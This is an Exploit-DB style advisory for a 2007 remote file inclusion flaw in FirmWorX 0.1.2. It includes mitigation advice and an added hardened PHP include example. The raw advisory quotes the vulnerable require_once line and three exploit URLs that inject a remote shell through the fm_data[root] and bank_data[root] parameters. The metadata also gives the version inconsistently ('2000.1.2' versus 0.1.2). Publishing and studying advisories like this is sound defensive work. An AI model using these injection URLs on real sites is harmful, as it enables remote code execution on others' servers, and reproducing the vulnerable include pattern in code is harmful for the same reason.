Vendor: FirmWorX
By: DeltahackingTEAM
CVSS: 7.5 (HIGH)
CWE: Remote File Inclusion
Product Name: FirmWorX
Affected Version From: 2000.1.2
Affected Version To: 2000.1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

FirmWorX 0.1.2 Remote File Inclusion Vulnerability

The vulnerability allows remote attackers to execute arbitrary code by supplying a remote file path that the vulnerable application then includes.

Mitigation:

Ensure that input validation is performed on user-supplied input to prevent remote file inclusion attacks: never build an include path from request-controlled data. Remove or restrict any unnecessary file inclusion functionality.
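The following is an added example, not FirmWorX's own code, of how the include pattern shown in the raw advisory below (`require_once($fm_data['root']."/includes/config/db.inc.php")`) can be hardened so that the root used for includes is fixed at deploy time and a client-supplied `fm_data[root]` never reaches it. It assumes the file sits two directories below the application root and that the function and variable names are illustrative.

```php
<?php
// Added example (not FirmWorX's own code): hardened replacement for an include
// of the form  require_once($fm_data['root'] . "/includes/config/db.inc.php");
// where $fm_data['root'] could be populated from the request (?fm_data[root]=...).
// Assumptions: this file lives two directories below the application root, and
// includes may only ever come from inside that root.

declare(strict_types=1);

// 1. The include root is fixed at deploy time, never derived from request data.
$appRoot = realpath(__DIR__ . '/../..');
if ($appRoot === false) {
    exit('application root not found');
}

// 2. Refuse any request that tries to supply the array used for include paths,
//    so a register_globals-style injection of fm_data[root] cannot take effect.
foreach (array($_GET, $_POST, $_COOKIE) as $source) {
    if (array_key_exists('fm_data', $source)) {
        http_response_code(400);
        exit('fm_data may not be supplied by the client');
    }
}
$fm_data = array('root' => $appRoot);

/**
 * Resolve a relative include path and verify that it stays inside $root.
 * Rejects URLs, absolute paths and ../ traversal by allow-listing the
 * characters of the relative path and then comparing the canonical result
 * against the canonical root. Returns the safe absolute path.
 */
function safeIncludePath(string $root, string $relative): string
{
    if (preg_match('#^[A-Za-z0-9_./-]+$#', $relative) !== 1
        || strpos($relative, '..') !== false) {
        throw new RuntimeException("include path rejected: $relative");
    }
    $resolved = realpath($root . '/' . $relative);
    $prefix   = $root . DIRECTORY_SEPARATOR;
    if ($resolved === false || strncmp($resolved, $prefix, strlen($prefix)) !== 0) {
        throw new RuntimeException("include outside application root refused: $relative");
    }
    return $resolved;
}

// 3. The only path information that varies is a fixed, relative, checked string.
require_once safeIncludePath($fm_data['root'], 'includes/config/db.inc.php');
```

As defence in depth, keep `allow_url_include=Off` and `register_globals=Off` in php.ini (both are the defaults in supported PHP versions), so that even a missed include cannot fetch a remote file or have its variables seeded from the request.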

Exploit-DB raw data:

**********************************************************************************************************
                                              DeltaSecurityTEAM
                                              WwW.DeltaSecurity.iR
**********************************************************************************************************

* Portal Name = FirmWorX 0.1.2

* Class = Remote File Inclusion

* Risk = High (Remote File Execution)

* Download = http://firmworx.sourceforge.net

* Discovered By = DeltahackingTEAM

* User In Delta Team = Dav00d_Cracker

* Contact = Davood_cracker@yahoo.com

--------------------------------------------------------------------------------------------

Vulnerability C0de :


require_once($fm_data['root']."/includes/config/db.inc.php");

--------------------------------------------------------------------------------------------

- Expl0it:

http://localhost/[PATH]/includes/config/master.inc.php?fm_data[root]=Shellz?
http://localhost/[PATH]/includes/functions/master.inc.php?fm_data[root]=Shellz?
http://localhost/[PATH]/modules/bank/includes/design/main.inc.php?bank_data[root]=Shellz?

--------------------------------------------------------------------------------------------

Gr33tz : Dr.Trojan , Hiv++ , D_7j , L0rd , RezaYavari , Vpc , And all I

**********************************************************************************************************

# milw0rm.com [2007-05-24]